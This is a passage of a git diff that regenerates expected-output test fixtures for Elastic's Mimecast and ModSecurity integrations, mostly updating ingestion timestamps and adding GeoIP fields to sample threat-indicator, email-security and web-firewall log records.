filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051158200Z", + "ingested": "2021-12-14T14:48:21.740201418Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051176100Z", + "ingested": "2021-12-14T14:48:21.740202489Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json index 7123ee94e96..eec0f0f1123 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632077Z", + "ingested": "2021-12-14T14:48:22.310868961Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632093200Z", + "ingested": "2021-12-14T14:48:22.310870239Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632108200Z", + "ingested": "2021-12-14T14:48:22.310871493Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632122500Z", + "ingested": "2021-12-14T14:48:22.310872732Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632141Z", + "ingested": "2021-12-14T14:48:22.310874075Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632158800Z", + "ingested": "2021-12-14T14:48:22.310875429Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.632176600Z", + "ingested": "2021-12-14T14:48:22.310876598Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json index 23150b6a377..e3ecd05da78 100644 --- a/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ap_logs/_dev/test/pipeline/test-ttp-ap-logs.log-expected.json @@ -15,7 +15,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254286800Z", + "ingested": "2021-12-14T14:48:22.845496090Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"numbers.pdf\",\"fileType\":\"application\\/pdf\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T18:54:32+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 4 sec\",\"route\":\"inbound\",\"messageId\":\"\u003c20200806044148.F35F813B435@mail.brianjthronton.com\u003e\",\"subject\":\"Important Updated Numbers from the Center for Disease Control\",\"fileHash\":\"eaeef09b60a59b913e9bfc0a4373e25d6182beff388957473fba517cc09345e3\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T18:54:32+0000" }, @@ -61,7 +61,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254295600Z", + "ingested": "2021-12-14T14:48:22.845498572Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus-Test Doc - Classification - InternalUseOnly.docx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.wordprocessingml.document\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"2fb26be55ac710e4d9f80677ba24ae212dbb36bd934a0569fe521839e9f5d16e\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, @@ -107,7 +107,7 @@ }, "event": { "action": "user_release_none", - "ingested": "2021-12-09T15:16:07.254301700Z", + "ingested": "2021-12-14T14:48:22.845499051Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"fileName\":\"Titus classification v0.3.pptx\",\"fileType\":\"application\\/vnd.openxmlformats-officedocument.presentationml\",\"result\":\"safe\",\"actionTriggered\":\"user release, none\",\"date\":\"2021-10-14T11:24:23+0000\",\"details\":\"Safe \\r\\nTime taken: 0 hrs, 0 min, 5 sec\",\"route\":\"inbound\",\"messageId\":\"\u003cDB8P194MB0824EE4C8D360CCE3DEB0243A1B89@DB8P194MB0824.EURP194.PROD.OUTLOOK.COM\u003e\",\"subject\":\"FW: Titus classification work\",\"fileHash\":\"111b86e1244ce6389efb60cddc001d594d334c540e85f9976be467a4ce472973\",\"definition\":\"Inbound - Safe file with On-Demand Sandbox\"}", "created": "2021-10-14T11:24:23+0000" }, diff --git a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json index d6fab92838c..cd58b61e693 100644 --- a/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_ip_logs/_dev/test/pipeline/test-ttp-ip-logs.log-expected.json @@ -18,7 +18,7 @@ }, "event": { "action": "none", - "ingested": "2021-12-09T15:16:07.465640200Z", + "ingested": "2021-12-14T14:48:23.039517642Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG\",\"senderAddress\":\"smtp@example.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Requested File\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T17:10:46+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe Jr \u003cjohndoejr@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe Jr\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cEE7E97EA-1926-4A90-9399-D049A98893F4@emailsec.ninja\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjU1NjIw1FEqSy0qzszPU7ICskvywAoNDAyVagFirRIG", "created": "2021-10-15T17:10:46+0000" @@ -71,7 +71,7 @@ }, "event": { "action": "none", - "ingested": "2021-12-09T15:16:07.465645200Z", + "ingested": "2021-12-14T14:48:23.039520180Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs\",\"senderAddress\":\"johndoe@gmail.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Fwd: Here ya go\",\"definition\":\"IP - 1 hit (Tag email)\",\"hits\":1,\"identifiers\":[\"internal_user_name\"],\"action\":\"none\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-15T06:16:34+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"John Doe \u003cjohndoe@example.com\u003e\",\"stringSimilarToDomain\":\"John Doe\",\"checkerResult\":\"hit\"}],\"messageId\":\"\u003cCAOsCE-eP_fM6j=OL7Mwufic_s8t8VgNaCWdWM+sHYvWAFxiDig@mail.gmail.com\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzszAx0VEqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGShEhs", "created": "2021-10-15T06:16:34+0000" @@ -124,7 +124,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:07.465651500Z", + "ingested": "2021-12-14T14:48:23.039520641Z", "original": "{\"id\":\"MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc\",\"senderAddress\":\"johndoe@mimecast.com\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"RE: MSP Sales of Managed E2E\",\"definition\":\"IP - 2 hits (Hold for Review \\/ User Hold)\",\"hits\":2,\"identifiers\":[\"targeted_threat_dictionary\",\"internal_user_name\"],\"action\":\"hold\",\"taggedExternal\":false,\"taggedMalicious\":true,\"senderIpAddress\":\"67.43.156.15\",\"eventTime\":\"2021-10-13T16:12:07+0000\",\"impersonationResults\":[{\"impersonationDomainSource\":\"internal_user_name\",\"similarDomain\":\"Emily Doe \u003cemilydoe@example.com\u003e\",\"stringSimilarToDomain\":\"Emily Doe\",\"checkerResult\":\"hit\"},{\"impersonationDomainSource\":\"targeted_threat_dictionary\",\"stringSimilarToDomain\":\"who\"}],\"messageId\":\"\u003cPR3P194MB06183A3BE81F0831A8402B47D3B79@PR3P194MB0618.EURP194.PROD.OUTLOOK.COM\u003e\"}", "id": "MTOKEN:eNqrVkouLS7Jz00tSs5PSVWyUnI2MXM0N1XSUcpMUbIyMjUzMDMz01EqSy0qzszPU7Iy1FEqyQMrNDAwVaoFAGQhEhc", "created": "2021-10-13T16:12:07+0000" diff --git a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json index ed7f5ccbef8..7531f183166 100644 --- a/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json +++ b/packages/mimecast/data_stream/ttp_url_logs/_dev/test/pipeline/test-ttp-url-logs.log-expected.json @@ -28,7 +28,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699281Z", + "ingested": "2021-12-14T14:48:23.257050639Z", "original": "{\"userEmailAddress\": \"johndoe@example.com\", \"fromUserEmailAddress\": \"bestbuyinfo@emailinfo.bestbuy.com\", \"url\": \"https://click.emailinfo2.bestbuy.com/?qs=5c47c91aeb44fac857370c26ddf09c3f484431e1ccfa636fc64e26e40dd87efdb43d4deeeab8c2e727ebfa079e8cf1404c095c511152e4b09e7d00bf8377f32d\", \"ttpDefinition\": \"Inbound URL 'Aggressive'\", \"subject\": \"Today only: Save $100 on Tineco Pure One S12 smart cordless stick vacuum, plus more.\", \"action\": \"allow\", \"adminOverride\": \"N/A\", \"userOverride\": \"None\", \"scanResult\": \"clean\", \"category\": \"Business\", \"sendingIp\": \"67.43.156.15\", \"userAwarenessAction\": \"Continue\", \"date\": \"2021-10-16T14:45:34+0000\", \"actions\": \"Allow\", \"route\": \"inbound\", \"creationMethod\": \"User Click\", \"emailPartsDescription\": [ \"Body\" ], \"messageId\": \"\u003c31b43097-94f9-4f64-8e37-8ad23650c692@ind1s01mta1292.xt.local\u003e\" }", "created": "2021-10-16T14:45:34+0000" }, @@ -86,7 +86,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699289800Z", + "ingested": "2021-12-14T14:48:23.257055410Z", "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"noreply@r.livingsocial.com\",\"url\":\"https:\\/\\/www.livingsocial.com\\/browse\\/?locale=en_US\u0026topCategory=all-deals\u0026p=14\u0026utm_source=newsletter_im\u0026utm_medium=email\u0026t_division=boston\u0026date=20211016\u0026uu=1bea09ca-8a29-11e9-b7f7-0242ac120002\u0026CID=US\u0026tx=0\u0026s=body\u0026c=banner\u0026d=dynamic-banner-4\u0026utm_campaign=194d1bb8-dc74-4bed-b470-0154e934bfb3_0_20211016_treatment0\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"Jump Pass + Mega Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Business\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T14:07:38+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c803962655.28921622.1634393221485.JavaMail.rocketman@push-dispatcher65.sac1\u003e\"}", "created": "2021-10-16T14:07:38+0000" }, @@ -144,7 +144,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699295800Z", + "ingested": "2021-12-14T14:48:23.257055914Z", "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", "created": "2021-10-16T13:31:56+0000" }, diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index d2b7686c1e5..957d4fa8ced 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: mimecast title: "Mimecast" -version: 0.0.3 +version: 0.0.4 license: basic description: "Fetching logs from Mimecast API and ingest into Elasticsearch" type: integration diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml index 96051cf9a71..07a52903ca9 100644 --- a/packages/modsecurity/changelog.yml +++ b/packages/modsecurity/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.3" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.1.2" changes: - description: Change test public IPs to the supported subset diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json index d1a020c97c9..b52c2bcceaa 100644 --- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json @@ -10,6 +10,18 @@ "id": "920350" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 44464, "ip": "67.43.156.14" }, @@ -39,7 +51,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:30.594992100Z", + "ingested": "2021-12-14T14:48:26.828825059Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.14\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"67.43.156.14\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -64,33 +76,18 @@ } }, { + "@timestamp": "2021-05-14T15:11:52.000Z", "modsec": { "audit": { "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" } }, - "rule": { - "id": "920350" - }, - "source": { - "port": 40742, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", - "url": { - "path": "/", - "original": "https://34.87.56.16:443/", - "scheme": "https", - "port": 443, - "domain": "34.87.56.16" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-05-14T15:11:52.000Z", "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" @@ -101,8 +98,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 40742, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.594995900Z", + "ingested": "2021-12-14T14:48:26.828827545Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -111,22 +125,7 @@ "access" ], "kind": "event" - } - }, - { - "modsec": { - "audit": { - "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" - } - }, - "rule": { - "id": "920350" }, - "source": { - "port": 44460, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", "url": { "path": "/", "original": "https://34.87.56.16:443/", @@ -136,11 +135,21 @@ }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2021-05-14T15:12:01.000Z", + "modsec": { + "audit": { + "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" + } + }, "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" @@ -151,8 +160,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 44460, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.595002200Z", + "ingested": "2021-12-14T14:48:26.828828014Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, 